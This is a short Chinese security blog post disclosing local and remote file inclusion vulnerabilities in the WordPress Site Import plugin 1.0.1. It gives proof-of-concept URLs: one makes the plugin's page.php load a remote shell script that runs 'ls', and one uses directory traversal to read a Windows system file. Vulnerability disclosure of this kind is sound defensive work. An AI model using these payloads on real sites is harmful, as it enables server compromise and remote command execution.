WordPress Site Import Plugin 1.0.1本地和远程文件包含漏洞

POC

远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

本文固定链接: https://www.unhonker.com/bug/1902.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2016年03月15日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Site Import Plugin 1.0.1本地和远程文件包含漏洞 | 90' s Blog|关注网络信息安全
关键字:

WordPress Site Import Plugin 1.0.1本地和远程文件包含漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!